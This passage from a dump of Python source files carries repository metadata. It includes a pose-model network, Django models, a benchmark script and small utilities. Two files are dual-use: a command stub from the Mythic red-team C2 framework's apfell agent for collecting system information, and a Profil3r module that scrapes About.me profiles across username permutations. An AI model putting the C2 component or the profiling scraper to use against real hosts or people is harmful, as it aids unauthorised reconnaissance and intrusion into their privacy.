s_gcn(16, 32, kernel_size, 2, **kwargs),
s_gcn(32, 32, kernel_size, 1, **kwargs),
s_gcn(32, 64, kernel_size, 2, **kwargs),
s_gcn(64, 64, kernel_size, 1, **kwargs),
s_gcn(64, 64, kernel_size, 1, **kwargs),
#s_gcn(128, 256, kernel_size, 2, **kwargs),
#s_gcn(256, 256, kernel_size, 1, **kwargs),
#s_gcn(256, 256, kernel_size, 1, **kwargs),
))
# initialize parameters for edge importance weighting
if edge_importance_weighting:
self.edge_importance = nn.ParameterList([
nn.Parameter(torch.ones(self.A.size()))
for i in self.st_gcn_networks
])
else:
self.edge_importance = [1] * len(self.st_gcn_networks)
# single LSTM
self.lstm = nn.LSTM(25*64, 25*64, 3, batch_first = True)
# encode to mean and var
self.mean_fc = nn.Linear(25*64, self.latent_size)
self.var_fc = nn.Linear(25*64, self.latent_size)
# decoder
self.decod_fc1 = nn.Linear(100, 100)
self.decod_fc2 = nn.Linear(100, 75)
def forward(self, x):
# data normalization
N, C, T, V, M = x.size() # 1, 3, T, 25, M
#x = x.permute(0, 4, 3, 1, 2).contiguous()
#x = x.view(N * M, V * C, T)
#x = self.data_bn(x)
#x = x.view(N, M, V, C, T) # 1, M, 25, 3, T
#x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.permute(0, 4, 1, 2, 3).contiguous()
x = x.view(N * M, C, T, V) # BxM, 3, T, 25
#get batch of frames
x = x.permute(0, 2, 1, 3).contiguous()
x = x.view(N * M * T, C, 1, V) # BxMxT, 3, 1, 25
# forward
for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
x, _ = gcn(x, self.A * importance)
x = x.view(N*M, T, 64*25)
# sample
samp = torch.randn([N*M, self.latent_size]).cuda()
# pass to an LSTM
x, _ = self.lstm(x)
means = self.mean_fc(x)
varis = self.var_fc(x)
stds = torch.exp(0.5 * varis)
z = samp * stds + means
if self.pose:
y = self.decod_fc1(z)
predicted = self.decod_fc2(y)
predicted = predicted.view(N, C, T, V, M)
return predicted, means, varis, z
else:
return z
def extract_avg_feature(self, x):
# data normalization
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
# forwad
for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
x, _ = gcn(x, self.A * importance)
# global pooling
x = F.avg_pool2d(x, x.size()[2:])
x = x.view(N, M, -1, 1, 1).mean(dim=1)
feature = x
feature = feature.view(N, -1)
# prediction
x = self.fcn(x)
x = x.view(x.size(0), -1)
return x, feature
def extract_feature(self, x):
# data normalization
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
# forwad
for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
x, _ = gcn(x, self.A * importance)
_, c, t, v = x.size()
feature = x.view(N, M, c, t, v).permute(0, 2, 3, 4, 1)
# prediction
x = self.fcn(x)
output = x.view(N, M, -1, t, v).permute(0, 2, 3, 4, 1)
return output, feature
class st_gcn(nn.Module):
r"""Applies a spatial temporal graph convolution over an input graph sequence.
Args:
in_channels (int): Number of channels in the input sequence data
out_channels (int): Number of channels produced by the convolution
kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel
stride (int, optional): Stride of the temporal convolution. Default: 1
dropout (int, optional): Dropout rate of the final output. Default: 0
residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``
Shape:
- Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format
- Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format
- Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format
- Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format
where
:math:`N` is a batch size,
:math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,
:math:`T_{in}/T_{out}` is a length of input/output sequence,
:math:`V` is the number of graph nodes.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
dropout=0,
residual=True):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
padding = ((kernel_size[0] - 1) // 2, 0)
self.gcn = ConvTemporalGraphical(in_channels, out_channels,
kernel_size[1])
self.tcn = nn.Sequential(
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(
out_channels,
out_channels,
(kernel_size[0], 1),
(stride, 1),
padding,
),
nn.BatchNorm2d(out_channels),
nn.Dropout(dropout, inplace=True),
)
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=1,
stride=(stride, 1)),
nn.BatchNorm2d(out_channels),
)
self.relu = nn.ReLU(inplace=True)
def forward(self, x, A):
res = self.residual(x)
x, A = self.gcn(x, A)
x = self.tcn(x) + res
return self.relu(x), A
class s_gcn(nn.Module):
r"""Applies a spatial temporal graph convolution over an input graph sequence.
Args:
in_channels (int): Number of channels in the input sequence data
out_channels (int): Number of channels produced by the convolution
kernel_size (tuple): Size of the temporal convolving kernel and graph convolving kernel
stride (int, optional): Stride of the temporal convolution. Default: 1
dropout (int, optional): Dropout rate of the final output. Default: 0
residual (bool, optional): If ``True``, applies a residual mechanism. Default: ``True``
Shape:
- Input[0]: Input graph sequence in :math:`(N, in_channels, T_{in}, V)` format
- Input[1]: Input graph adjacency matrix in :math:`(K, V, V)` format
- Output[0]: Outpu graph sequence in :math:`(N, out_channels, T_{out}, V)` format
- Output[1]: Graph adjacency matrix for output data in :math:`(K, V, V)` format
where
:math:`N` is a batch size,
:math:`K` is the spatial kernel size, as :math:`K == kernel_size[1]`,
:math:`T_{in}/T_{out}` is a length of input/output sequence,
:math:`V` is the number of graph nodes.
"""
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
dropout=0,
residual=True):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
padding = ((kernel_size[0] - 1) // 2, 0)
self.gcn = ConvTemporalGraphical(in_channels, out_channels,
kernel_size[1])
# self.tcn = nn.Sequential(
# nn.BatchNorm2d(out_channels),
# nn.ReLU(inplace=True),
# nn.Conv2d(
# out_channels,
# out_channels,
# (kernel_size[0], 1),
# (stride, 1),
# padding,
# ),
# nn.BatchNorm2d(out_channels),
# nn.Dropout(dropout, inplace=True),
# )
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(
nn.Conv2d(
in_channels,
out_channels,
kernel_size=1,
stride=(stride, 1)),
nn.BatchNorm2d(out_channels),
)
self.relu = nn.ReLU(inplace=True)
def forward(self, x, A):
res = self.residual(x)
x, A = self.gcn(x, A)
x = x + res
return self.relu(x), A
|
[
"qdhuangzhengjia@126.com"
] |
qdhuangzhengjia@126.com
|
cac54f9c3610a1187fec20f24debef77a07c6be6
|
4e34eeec2783ab853388a322d7ff29c208f54f24
|
/python/cymel/utils/melgvar.py
|
c1a0afe4e26c6014fa9f476cb17d32b97e94d0ed
|
[
"MIT"
] |
permissive
|
cia-rana/cymel
|
faa3d404e3aacd9b78960638fe0075ea06224bd0
|
1fb749e53d75afb2857c15b54a2f03b0f7859062
|
refs/heads/main
| 2022-12-29T19:01:41.372196
| 2020-10-19T03:08:36
| 2020-10-19T03:08:36
| 305,246,996
| 0
| 0
|
MIT
| 2020-10-19T02:56:18
| 2020-10-19T02:56:17
| null |
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
# -*- coding: utf-8 -*-
u"""
MELグローバル変数ラッパー。
"""
from ..pyutils import Singleton
import maya.mel as mel
__all__ = ['MelVar', 'melvar']
_mel_eval = mel.eval
#------------------------------------------------------------------------------
class MelVar(object):
u"""
MELグローバル変数ラッパークラス。
`dict` のような振る舞いをする。
唯一のインスタンス `melvar` が生成済み。
参照のみが可能で、セットや削除はサポートされない。
"""
__metaclass__ = Singleton
def __contains__(self, key):
return ('$' + key) in _mel_eval('env()')
def has_key(self, key):
return ('$' + key) in _mel_eval('env()')
def __len__(self):
return len(_mel_eval('env()'))
def __iter__(self):
for k in _mel_eval('env()'):
yield k[1:]
def __getitem__(self, key):
try:
return _mel_eval('$%s=$%s' % (key, key))
except RuntimeError:
raise KeyError(key)
def __setitem__(self, key, val):
raise TypeError('setter is not surported')
def __delitem__(self, key):
raise TypeError('deleter is not surported')
def keys(self):
for k in _mel_eval('env()'):
yield k[1:]
def values(self):
for k in _mel_eval('env()'):
yield _mel_eval('%s=%s' % (k, k))
def items(self):
for k in _mel_eval('env()'):
yield k[1:], _mel_eval('%s=%s' % (k, k))
def get(self, key, default=None):
try:
return _mel_eval('$%s=$%s' % (key, key))
except RuntimeError:
return default
melvar = MelVar() #: `MelVar` の唯一のインスタンス。
|
[
"20365380+ryusas@users.noreply.github.com"
] |
20365380+ryusas@users.noreply.github.com
|
3b4258e2f4a96a8a96e4dbb400445ef2960b50fb
|
5b074b495a4954f23551e724906d76797d89e346
|
/stream/stream_scpt
|
9b1f474a551e233af36cd1ac52868502918eeaaf
|
[] |
no_license
|
m-conklin/docker-benchmarking
|
c75b7e7a2049a0cf95e9eaa9ac4571728a793b40
|
d26a69e8d5d752a5919b04878f1effb7d4388e76
|
refs/heads/master
| 2020-05-15T09:47:14.964534
| 2015-05-07T21:21:52
| 2015-05-07T21:21:52
| 34,288,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 934
|
#!/usr/bin/python
import subprocess
def initialize_file(f):
f.write('Rate (MB/s),Avg time,Min time,Max time \n')
def run_stream(times):
for i in range(times):
subprocess.call('./stream_c.exe', stdout=writeout)
copy = open('copy_results.csv', 'a')
scale = open('scale_results.csv', 'a')
add = open('add_results.csv', 'a')
triad = open('triad_results.csv', 'a')
files = [copy, scale, add, triad]
for f in files:
initialize_file(f)
writeout = open('out.txt', 'w')
output = open('out.txt', 'r')
run_stream(5)
for line in output:
line = line.split()
f = line[0].lower()
if f == 'copy:':
copy.write(",".join(line[1:]) + '\n')
elif f == 'scale:':
scale.write(",".join(line[1:]) + '\n')
elif f == 'add:':
add.write(",".join(line[1:]) + '\n')
elif f == 'triad:':
triad.write(",".join(line[1:]) + '\n')
output.close()
for f in files:
f.close()
|
[
"mjmc@uvic.ca"
] |
mjmc@uvic.ca
|
|
7c4a9c9289253642281c4520d51df84727bed704
|
88bd85d5cd9e9b29d5e58826963bf51da4eb1a73
|
/trip_project/trip_project/trip_app/models.py
|
83dac62812bed7e4707b4990b6ee958aa208e4ce
|
[] |
no_license
|
YasaswiPoolla/portal
|
954e4364575bbc09370bd019474460e19508d03d
|
61cbc7159113fa77f79483f33c370cc68da345e1
|
refs/heads/master
| 2022-11-20T03:35:31.497680
| 2020-07-23T05:40:54
| 2020-07-23T05:40:54
| 275,518,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,596
|
py
|
from django.db import models
from django.contrib.postgres.fields import JSONField
from django.contrib.auth.base_user import AbstractBaseUser
from trip_project.trip_app.model_managers import UserManager
import os
# Create your models here.
class User(AbstractBaseUser):
objects = UserManager()
user_sqn = models.BigAutoField(primary_key=True)
first_name = models.CharField(max_length=50, db_column="firstname")
last_name = models.CharField(max_length=50, db_column="lastname")
email = models.EmailField(unique=True)
mobile = models.CharField(max_length=20, db_column="mobile")
last_login = models.DateTimeField(db_column="last_login", auto_now_add=True)
is_active = models.BooleanField(default=False, db_column="isActive")
profile_image = models.FileField(blank=True, null=True,upload_to=lambda instance, filename: '{0}_{1}/profile/{2}'.format(instance.first_name, instance.user_sqn, filename))
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
class UserException(models.Model):
exception_sqn = models.BigAutoField(primary_key=True)
user = models.ForeignKey(User, on_delete=models.PROTECT, db_column="user_sqn", null=True)
user_request = JSONField()
stack_trace = models.TextField()
log_datetime = models.DateTimeField(db_column="logDateTime", auto_now_add=True)
status = models.BooleanField(default=False)
class Trips(models.Model):
trip_sqn = models.BigAutoField(primary_key=True)
from_location = models.CharField(max_length=50, db_column="fromlocation")
to_location = models.CharField(max_length=50, db_column="tolocation")
trip_date = models.DateTimeField(db_column="tripdate", auto_now_add=True)
trip_distance = models.BigIntegerField(null=True,db_column="tripdistance")
user = models.ForeignKey(User, on_delete=models.PROTECT, db_column="user_sqn")
class Locations(models.Model):
location_sqn = models.BigAutoField(primary_key=True)
latitude = models.DecimalField(max_digits=9, decimal_places=6)
longitude = models.DecimalField(max_digits=9, decimal_places=6)
created_date = models.DateTimeField(db_column="at_location", auto_now_add=True,null=True,blank=True)
location_name = models.CharField(max_length=50, db_column="locationname")
trip = models.ForeignKey(Trips, on_delete=models.PROTECT, db_column="trip_sqn")
class TripImages(models.Model):
images_sqn = models.BigAutoField(primary_key=True)
images = models.FileField(blank=True, null=True,upload_to='memories')
trip = models.ForeignKey(Trips, on_delete=models.PROTECT, db_column="trip_sqn")
|
[
"yasaswi.poolla@itcrats.com"
] |
yasaswi.poolla@itcrats.com
|
201b1db04ac60fa983e1f615ea2c91f55878b0e8
|
5af4814716bb56d1d941938ccc0b69c2297901ce
|
/main/urls.py
|
832fd55cf43bfae923400a70ac62e8b1067a5d07
|
[
"MIT"
] |
permissive
|
geosoco/coding_experiment
|
5f6ea8204c0043d45cbcf21de3934db12c162dd0
|
bd17b703c3ba7a3de59ffc846fbcbbdb42fa8a77
|
refs/heads/master
| 2021-01-18T22:40:27.486559
| 2015-08-20T06:43:21
| 2015-08-20T06:43:21
| 32,149,899
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,726
|
py
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.auth.decorators import login_required, permission_required
from main.views import *
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'coding_experiments.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
#url(r'^$', 'main.views.home', name='home'),
url(r'^landing/(?P<cnd>\d+)/$', 'main.views.landing', name='landing'),
url(r'^landing/$', 'main.views.landing', name='landing'),
url(r'^instructions/$', 'main.views.instructions', name='instructions'),
url(r'^instructions/(?P<page>\d+)/$', 'main.views.instructions', name='instructions'),
url(r'^coding/((?P<page>\d+)/|)$', 'main.views.coding', name='coding'),
url(r'^thanks/$', 'main.views.thanks', name='thanks'),
url(r'^validate/((?P<page>\d+)/|)$', 'main.views.validate', name='validate'),
url(r'^survey/pre/$', 'main.views.pre_survey', name='pre_survey'),
url(r'^survey/post/$', 'main.views.post_survey', name='post_survey'),
url(r'^reqcheck/$', 'main.views.req_check', name='req_check'),
url(r'^instructioncheck/$', InstructionCheck.as_view(), name='instruction_check'),
url(r'^pause/$', 'main.views.bonus_check', name='bonus_check'),
url(r'^$', HomeView.as_view(), name='user_home'),
url(r'^coding2/(?P<assignment_id>\d+)/$', UserCodingView2.as_view(), name='user_coding'),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
[
"soco@uw.edu"
] |
soco@uw.edu
|
16d6a6a7cfe30d87484fca8b87ca9ea6071ced6e
|
4bcb3335cb1defafeadda7c5f1641b772dcfd105
|
/Payload_Types/apfell/mythic/agent_functions/system_info.py
|
ceccb71f3dee17a3ed9b21322332461b415d84af
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
axax002/Mythic
|
664f7714ea6181b5d4e82a49b7ca5e09d3781c9c
|
7614ab8f809d8108a4f5cf13c926f3ffbc1eb4a7
|
refs/heads/master
| 2022-12-15T00:08:00.149526
| 2020-09-09T16:10:15
| 2020-09-09T16:10:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 951
|
py
|
from CommandBase import *
import json
class SystemInfoArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {}
async def parse_arguments(self):
pass
class SystemInfoCommand(CommandBase):
cmd = "system_info"
needs_admin = False
help_cmd = "system_info"
description = "This uses JXA to get some system information. It doesn't send Apple Events to any other applications though, so it shouldn't cause popups."
version = 1
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_remove_file = False
is_upload_file = False
author = "@its_a_feature_"
attackmapping = ["T1082"]
argument_class = SystemInfoArguments
async def create_tasking(self, task: MythicTask) -> MythicTask:
return task
async def process_response(self, response: AgentResponse):
pass
|
[
"codybthomas@gmail.com"
] |
codybthomas@gmail.com
|
9a2a89571629f1ba6411e3d1debcf55c992f304a
|
b413c51273a6cf4e5d4e9fa5a618d16c73379627
|
/NotesCmd/NotesCmd/NotesCmd.py
|
d974f9c59d8ab39f87bb3673c43daba40a88fba2
|
[] |
no_license
|
CorvusEtiam/gSimpleNotes
|
038ea5e38a3e76406dc3ab713a1537707f7c7745
|
76659610db641f84b3b185a0347a31a58dcd6769
|
refs/heads/master
| 2021-05-28T07:38:55.702153
| 2012-08-22T12:19:05
| 2012-08-22T12:19:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,704
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
### ::FUNCTION :: ###
def number_of_line():
"""Liczba linii w pliku"""
i = 0
with open("Notes.txt", "r") as NOL:
for line in NOL:
try:
if line.strip() != False and line[1] != "@":
i = i+1
except IndexError:
pass
return i
#########################
### DELETE LINES ###
#########################
def delete(x):
"""Usuwanie linii do podanego momentu"""
with open("Notes.txt","r") as f:
items = f.readlines()
with open("Notes.txt","w") as out:
for item in items[x:]:
out.write("%s\n" % item)
#########################
print "Wybierz\n"
print "|A|dd line\n|R|ead Note File\n|D|elete\n|Q|uit"
choice = "n"
#########################
while choice.lower() != "q":
choice = raw_input("Twoj wybor:\t")
if choice.lower() == "a":
text = raw_input("Podaj notatke. ENTER konczy\n\n")
with open("Notes.txt","a") as notefile:
NOL = number_of_line()+1
if text[0] != '@':
notefile.write("["+str(NOL)+"] "+text+"\n")
else:
notefile.write(text+"\n")
continue
elif choice.lower() == "r" :
notefile = open("Notes.txt","r")
print notefile.read()
notefile.close()
continue
elif choice.lower() == "d":
x = raw_input("Ile linii usunac?")
delete(int(x))
continue
else:
continue
|
[
"misiek.rybicki@gmail.com"
] |
misiek.rybicki@gmail.com
|
f167be233949bfb768555958776936a25182c8af
|
7c9ad91cdec19680ead79d76eed51e79b2dc9d07
|
/code/vs/feeanalyzer.py
|
38d10aeb18737f1b7c1b2044394267e1a6a00093
|
[
"MIT"
] |
permissive
|
renepickhardt/Imbalance-measure-and-proactive-channel-rebalancing-algorithm-for-the-Lightning-Network
|
d6183f398af05b35b31e8a8a55ceb673afb34618
|
0a2613b5e94185b68869962cdf13a19053adfdd8
|
refs/heads/master
| 2020-09-19T03:32:11.037387
| 2020-05-06T17:22:15
| 2020-05-06T17:22:15
| 224,196,298
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 524
|
py
|
import matplotlib.pyplot as plt
import numpy as np
f = open("finalResults/fullExperimentNonStrictRebalancing/better_balanced_directed_lightning_network_fees_3_5000_fees", "r")
fees = []
for l in f:
fee = float(l[:-1].split("\t")[1])
if abs(fee) > 100000:
print(fee)
else:
fees.append(fee)
print(max(fees))
f = open("directed_lightning_network", "r")
for l in f:
base = int(l[:-1].split("\t")[5])
if base > 100000:
print(base)
plt.hist(fees, bins=20)
plt.grid()
plt.show()
#
|
[
"r.pickhardt@gmail.com"
] |
r.pickhardt@gmail.com
|
2ff71f9e8d27959860fa92a8f3b988dbfe9f0b0f
|
9bf28e7a926046d1d30fb4a7c8eb4733e7e77bbf
|
/vim/pythonx/cpp_file_navigator.py
|
0f71edec6339070c600b7e8ccc3649b1468abdb5
|
[] |
no_license
|
KKoovalsky/dotfiles
|
c3f7dd453760a7f101358aff7ff2a0f473d84c9d
|
62a803724a0cddb55781387271f348072812b377
|
refs/heads/master
| 2023-08-04T19:17:39.883223
| 2023-08-01T09:35:46
| 2023-08-01T09:35:46
| 199,640,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,643
|
py
|
import clang.cindex as clcidx
import os
import itertools
def find_last_line_of_constructor(class_name, source_file):
ctor = _get_first_node_that_matches(
_is_constructor_of_class(class_name), source_file)
return ctor.extent.end.line
def find_class_name_of_method_at_line(header_file, method_line_num):
method_cursor = _find_method_at_line(header_file, method_line_num)
return method_cursor.semantic_parent.displayname
def _find_method_at_line(source_file, line_number):
return _get_first_node_that_matches(_is_method_at_line(line_number),
source_file)
def _get_first_node_that_matches(predicate, source_file):
nodes_it = _get_translation_unit_nodes_from_file(source_file)
matches_it = _filter_nodes(nodes_it, predicate)
return next(matches_it)
def _get_translation_unit_nodes_from_file(source_file):
index = clcidx.Index.create()
tu = index.parse(source_file)
filename = os.path.split(source_file)[-1]
return filter(lambda x: x.location.file.name.endswith(filename),
tu.cursor.get_children())
def _filter_nodes(nodes_it, predicate):
list_with_filtered = [
filter(predicate, node.walk_preorder()) for node in nodes_it]
return itertools.chain.from_iterable(list_with_filtered)
def _is_constructor_of_class(class_name):
return lambda node: node.kind == clcidx.CursorKind.CONSTRUCTOR and \
'{}'.format(class_name) in node.displayname
def _is_method_at_line(line_number):
return lambda node: node.kind == clcidx.CursorKind.CXX_METHOD and \
node.extent.start.line == line_number
|
[
"kacper.s.kowalski@gmail.com"
] |
kacper.s.kowalski@gmail.com
|
d2f2360b665e61c0e762037780f94210527ad4a7
|
b642c19ce7c6c14ef88f2b3fa1a05dac99146367
|
/profil3r/modules/hosting/aboutme.py
|
56da907ef20b7b6944a1b53ca3a0e41072fa60fc
|
[] |
no_license
|
Sahildholpuria/ProfileFinder
|
6212e59df89bfb454483d3930619d0ee828fb921
|
9ea517e961f48c98f234ccdc618ebea3f0f3455c
|
refs/heads/master
| 2023-06-17T08:17:27.337052
| 2021-07-20T04:30:47
| 2021-07-20T04:30:47
| 387,668,051
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,773
|
py
|
import requests
from bs4 import BeautifulSoup
import time
class AboutMe:
def __init__(self, config, permutations_list):
# 1000 ms
self.delay = config['plateform']['aboutme']['rate_limit'] / 1000
# https://about.me/{username}
self.format = config['plateform']['aboutme']['format']
self.permutations_list = permutations_list
# hosting
self.type = config['plateform']['aboutme']['type']
# Generate all potential aboutme usernames
def possible_usernames(self):
possible_usernames = []
for permutation in self.permutations_list:
possible_usernames.append(self.format.format(
permutation = permutation,
))
return possible_usernames
def search(self):
aboutme_usernames = {
"type": self.type,
"accounts": []
}
possible_usernames_list = self.possible_usernames()
for username in possible_usernames_list:
try:
r = requests.get(username)
except requests.ConnectionError:
print("failed to connect to aboutme")
# If the account exists
if r.status_code == 200:
# Account object
account = {}
# Get the username
account["value"] = username
# Parse HTML response content with beautiful soup
soup = BeautifulSoup(r.text, 'html.parser')
# Scrape the user informations
try:
user_username = str(soup.find_all(class_="name")[0].get_text()).strip() if soup.find_all(class_="name") else None
user_location = str(soup.find_all(class_="location")[1].get_text()).strip() if soup.find_all(class_="location") else None
user_role = str(soup.find_all(class_="role")[0].get_text()).strip() if soup.find_all(class_="role") else None
user_description = str(soup.find_all(class_="short-bio")[0].get_text()).strip() if soup.find_all(class_="short-bio") else None
account["username"] = {"name": "Username", "value": user_username}
account["location"] = {"name": "Location", "value": user_location}
account["role"] = {"name": "Role", "value": user_role}
account["description"] = {"name": "Description", "value": user_description}
except:
pass
# Append the account to the accounts table
aboutme_usernames["accounts"].append(account)
time.sleep(self.delay)
return aboutme_usernames
|
[
"dholpuria1999@gmail.com"
] |
dholpuria1999@gmail.com
|
b984fb235fc1f22cab5e15b05e2537f216c487fc
|
135277eba35389ad416b5da450781570b849d3f4
|
/ABCcompany/eventos/migrations/0001_initial.py
|
6638deb3d2e1aed2dadbd29de1e5d4aaa7ad0daa
|
[] |
no_license
|
AlejandroValenciaR/ProyectoWWW-Despliegue
|
d1f7740a398f1fc97d0ab730c189a763f61d7bdd
|
7cf71a7e76b757d74c110545fe17fa65d4023017
|
refs/heads/master
| 2021-08-30T01:06:10.036533
| 2017-12-15T13:27:51
| 2017-12-15T13:27:51
| 114,314,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,290
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-16 21:56
from __future__ import unicode_literals
from django.conf import settings
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Actividad',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('descripcion', models.TextField()),
('estado', models.BooleanField()),
('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
('hora_inicio', models.TimeField()),
('hora_fin', models.TimeField()),
],
),
migrations.CreateModel(
name='Evento',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
('fecha_inicio', models.DateField()),
('Hora_inicio', models.TimeField(default='00:00')),
('fecha_fin', models.DateField()),
('Hora_fin', models.TimeField(default='00:00')),
('estado', models.BooleanField()),
('ubicacion', models.CharField(max_length=200)),
('banner', models.ImageField(default='static/eventos/dist/img/avatar.png', storage=django.core.files.storage.FileSystemStorage(location='eventos/static/eventos/dist/img/imgevents/'), upload_to=b'')),
('descripcion', models.CharField(default='No hay descripcion', max_length=10000)),
],
),
migrations.CreateModel(
name='Inscripcion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha_inscripcion', models.DateTimeField(default=django.utils.timezone.now)),
('estado', models.BooleanField()),
('evento', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento')),
('inscrito', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Inscripcion_operador',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha_validacion', models.DateTimeField(default=django.utils.timezone.now)),
('inscripcion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Inscripcion')),
('operador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Noticia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=200)),
('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
('fecha_publicacion', models.DateTimeField()),
('contenido', models.TextField()),
('estado', models.BooleanField()),
('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('evento', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento')),
],
),
migrations.CreateModel(
name='Perfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cedula', models.BigIntegerField()),
('nombre', models.CharField(max_length=100)),
('celular', models.BigIntegerField()),
('telefono', models.BigIntegerField()),
('email', models.EmailField(max_length=254)),
('direccion', models.CharField(max_length=200)),
('pais', models.CharField(max_length=200)),
('ciudad', models.CharField(max_length=200)),
('sexo', models.CharField(default='N', max_length=2)),
('tipo', models.CharField(max_length=30)),
('session', models.CharField(default='0', max_length=1)),
('usuario', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='actividad',
name='evento',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento'),
),
]
|
[
"valencia.alejandro@correounivalle.edu.co"
] |
valencia.alejandro@correounivalle.edu.co
|
ada8a0fc4c3f798ca5a43eea5f8d3042918d428a
|
0ba1743e9f865a023f72a14d3a5c16b99ee7f138
|
/problems/test_0094_morris.py
|
fb7cea13d160e24ccdea5308098435effd0b0aaa
|
[
"Unlicense"
] |
permissive
|
chrisxue815/leetcode_python
|
d0a38a4168243b0628256825581a6df1b673855c
|
a33eb7b833f6998972e5340d383443f3a2ee64e3
|
refs/heads/main
| 2022-06-20T15:09:27.221807
| 2022-06-02T21:55:35
| 2022-06-02T21:55:35
| 94,590,264
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
import unittest
from typing import List
import utils
from tree import TreeNode
def _find_predecessor(curr):
p = curr.left
if not p:
return None
while p.right and p.right is not curr:
p = p.right
return p
# O(n) time. O(1) space. Morris in-order traversal.
class Solution:
def inorderTraversal(self, root: TreeNode) -> List[int]:
result = []
curr = root
while curr:
p = _find_predecessor(curr)
if p:
if p.right:
result.append(curr.val)
p.right = None
curr = curr.right
else:
p.right = curr
curr = curr.left
else:
result.append(curr.val)
curr = curr.right
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
root = TreeNode.from_array(case.args.root)
actual = Solution().inorderTraversal(root)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
[
"chrisxue815@gmail.com"
] |
chrisxue815@gmail.com
|
